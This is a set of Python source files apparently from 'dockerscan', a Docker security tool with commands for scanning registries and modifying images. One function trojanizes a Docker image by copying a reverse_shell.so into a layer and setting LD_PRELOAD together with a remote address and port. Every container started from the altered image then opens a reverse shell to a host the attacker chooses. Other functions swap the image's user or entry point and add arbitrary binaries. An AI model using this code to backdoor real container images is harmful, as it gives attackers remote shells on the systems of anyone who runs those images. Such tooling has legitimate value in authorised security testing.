    elif isinstance(results, (list, set, tuple)):
        for p in results:
            if isinstance(p, (str, bytes)):
                log.console("{}{}".format(padding,
                                          p))
            else:
                # log.console("{}  - {}:".format(p,
                #                                padding))
                display_results_console(p, log, new_padding)


__all__ = ("check_console_input_config", "get_remote_registry_info",
           "sanitize_url", "display_results_console")



import click
import logging

from dockerscan import global_options

from .scan.cli import scan
from .image.cli import image
from .registry.cli import registry

log = logging.getLogger('dockerscan')


@global_options()
@click.pass_context
def cli(ctx, **kwargs):
    ctx.obj = kwargs

cli.add_command(scan)
cli.add_command(image)
cli.add_command(registry)


if __name__ == "__main__" and __package__ is None:  # pragma no cover
    cli()



import json
import os.path
import logging
from contextlib import contextmanager

from dockerscan import DockerscanReturnContextManager
from .model import *
from ..docker_api import *

log = logging.getLogger("dockerscan")

REMOTE_SHELL_PATH = "/usr/share/lib/reverse_shell.so"


def run_image_modify_trojanize_dockerscan(
        config: DockerImageInfoModifyTrojanizeModel):

    assert isinstance(config, DockerImageInfoModifyTrojanizeModel)

    output_docker_image = config.output_image
    image_path = config.image_path

    if not output_docker_image:
        output_docker_image = os.path.basename(config.image_path)

    if not output_docker_image.endswith("tar"):
        output_docker_image += ".tar"

    # Choice the shell
    if not config.custom_shell:
        SHELL_PATH = os.path.join(os.path.dirname(__file__),
                                  "shells",
                                  "reverse_shell.so")
    else:
        SHELL_PATH = os.path.abspath(config.custom_shell)

    # 1 - Get layers info
    log.debug(" > Opening docker file")
    with open_docker_image(image_path) as (
            img, top_layer, _, manifest):

        # 2 - Get the last layer in manifest
        old_layer_digest = get_last_image_layer(manifest)
        log.debug(" > Last layer: {}".format(old_layer_digest))

        with extract_layer_in_tmp_dir(img, old_layer_digest) as d:

            # Start trojanizing
            log.info(" > Starting trojaning process")

            # 3 - Copy the shell
            log.info(" > Coping the shell: 'reverse_shell.so' "
                     "to '{}'".format(REMOTE_SHELL_PATH))

            copy_file_to_image_folder(d,
                                      SHELL_PATH,
                                      REMOTE_SHELL_PATH)

            new_layer_path, new_layer_digest = \
                build_image_layer_from_dir("new_layer.tar", d)

            # 5 - Updating the manifest
            new_manifest = build_manifest_with_new_layer(manifest,
                                                         old_layer_digest,
                                                         new_layer_digest)

            # Add new enviroment vars with LD_PRELOAD AND REMOTE ADDR
            json_info_last_layer = read_file_from_image(img,
                                                        "{}/json".format(
                                                            old_layer_digest))

            json_info_last_layer = json.loads(json_info_last_layer.decode())

            new_env_vars = {
                "LD_PRELOAD": REMOTE_SHELL_PATH,
                "REMOTE_ADDR": config.remote_addr,
                "REMOTE_PORT": config.remote_port
            }

            new_json_data_last_layer = update_layer_environment_vars(
                json_info_last_layer,
                new_env_vars
            )

            _, json_info_root_layer = get_root_json_from_image(img)
            new_json_info_root_layer = update_layer_environment_vars(
                json_info_root_layer,
                new_env_vars
            )

            # 6 - Create new docker image
            log.info(" > Creating new docker image")
            create_new_docker_image(new_manifest,
                                    output_docker_image,
                                    img,
                                    old_layer_digest,
                                    new_layer_path,
                                    new_layer_digest,
                                    new_json_data_last_layer,
                                    new_json_info_root_layer)


def run_image_modify_user_dockerscan(
        config: DockerImageInfoModifyUserModel):

    assert isinstance(config, DockerImageInfoModifyUserModel)

    output_docker_image = config.output_image
    image_path = config.image_path

    if not output_docker_image:
        output_docker_image = os.path.basename(config.image_path)

    if not output_docker_image.endswith("tar"):
        output_docker_image += ".tar"

    with modify_docker_image_metadata(image_path,
                                      output_docker_image) as (last_layer_json,
                                                               root_layer_json):

        new_json_data_last_layer = update_layer_user(last_layer_json,
                                                     config.new_user)
        new_json_info_root_layer = update_layer_user(root_layer_json,
                                                     config.new_user)

        raise DockerscanReturnContextManager(new_json_data_last_layer,
                                             new_json_info_root_layer)


def run_image_modify_entry_point_dockerscan(
        config: DockerImageInfoModifyEntryPointModel):

    assert isinstance(config, DockerImageInfoModifyEntryPointModel)

    output_docker_image = config.output_image
    image_path = config.image_path

    if not output_docker_image:
        output_docker_image = os.path.basename(config.image_path)

    if not output_docker_image.endswith("tar"):
        output_docker_image += ".tar"

    new_entry_point = config.new_entry_point

    add_binary_path = config.binary_path
    if add_binary_path:
        #
        # Add the new file to the image
        #
        log.info(" > Adding new data to the image")
        add_binary_path = os.path.abspath(add_binary_path)

        add_new_file_to_image(add_binary_path,
                              new_entry_point,
                              image_path)

    with modify_docker_image_metadata(image_path,
                                      output_docker_image) as (last_layer_json,
                                                               root_layer_json):

        new_json_data_last_layer = update_layer_entry_point(last_layer_json,
                                                            new_entry_point)
        new_json_info_root_layer = update_layer_entry_point(root_layer_json,
                                                            new_entry_point)

        raise DockerscanReturnContextManager(new_json_data_last_layer,
                                             new_json_info_root_layer)


__all__ = ("run_image_modify_trojanize_dockerscan",
           "run_image_modify_user_dockerscan",
           "run_image_modify_entry_point_dockerscan")



from dockerscan import SharedConfig, String


class DockerAnalyzeInfoModel(SharedConfig):
    registry = String()


class DockerAnalyzeUploadModel(SharedConfig):
    registry = String()
    local_file = String()
    remote_filename = String(default="")


class DockerAnalyzePushModel(SharedConfig):
    registry = String()
    local_image = String()
    image_name = String()
    tag = String(default="latest")


class DockerAnalyzeDeleteModel(SharedConfig):
    registry = String()
    image = String()


class RemoteRegistryDetails:

    def __init__(self,
                 address: str,
                 version: int,
                 domains: set,
                 has_authentication: bool):
        self.address = address
        self.version = version
        self.domains = domains
        self.has_authentication = has_authentication or False
        self.repositories = set()

    def add_respositories(self, repos: list):
        self.repositories.update(repos)

    def __repr__(self):
        return "<Registry:'{}' version={} / auth={}>".format(
            self.address,
            self.version,
            "Open" if not self.has_authentication else "Enabled"
        )

__all__ = ("DockerAnalyzeInfoModel", "RemoteRegistryDetails",
           "DockerAnalyzeUploadModel", "DockerAnalyzeDeleteModel",
           "DockerAnalyzePushModel")



"""
This file contains utils and reusable functions
"""
import logging

from collections import namedtuple
from contextlib import contextmanager

log = logging.getLogger("dockerscan")


def dict_to_obj(data):
    """
    Transform an input dict into a object.

    >>> data = dict(hello="world", bye="see you")
    >>> obj = dict_to_obj(data)
    >>> obj.hello
    'world'

    :param data: input dictionary data
    :type data: dict
    """
    assert isinstance(data, dict)

    if not data:
        return namedtuple("OBJ", [])

    obj = namedtuple("OBJ", list(data.keys()))

    return obj(**data)


def get_log_level(verbosity: int) -> int:
    verbosity *= 10

    if verbosity > logging.CRITICAL:
        verbosity = logging.CRITICAL

    if verbosity < logging.DEBUG:
        verbosity = logging.DEBUG

    return (logging.CRITICAL - verbosity) + 10


@contextmanager
def run_in_console(debug=False):
    try:
        yield
    except Exception as e:
        log.critical(" !! {}".format(e))

        if debug:
            log.exception(" !! Unhandled exception: %s" % e, stack_info=True)
    finally:
        log.debug("Shutdown...")


__all__ = ("dict_to_obj", "get_log_level", "run_in_console")



import click

from .model import *
from .console import *
from ..helpers import check_console_input_config


@click.command(help="Search for Open Docker Registries")
@click.pass_context
@click.argument("target")
@click.option("--timeout", "-t", "timeout", help="timeout for each port-check")
@click.option("--ports", "-p", "ports",
              help="ports to test. i.e: 80,443,8000-8080")
@click.option("-c", "concurrency", help="Maximum concurrency scans")
def scan(ctx, **kwargs):
    config = DockerScanModel(**ctx.obj, **kwargs)

    # Check if valid
    if check_console_input_config(config):
        launch_dockerscan_scan_in_console(config)
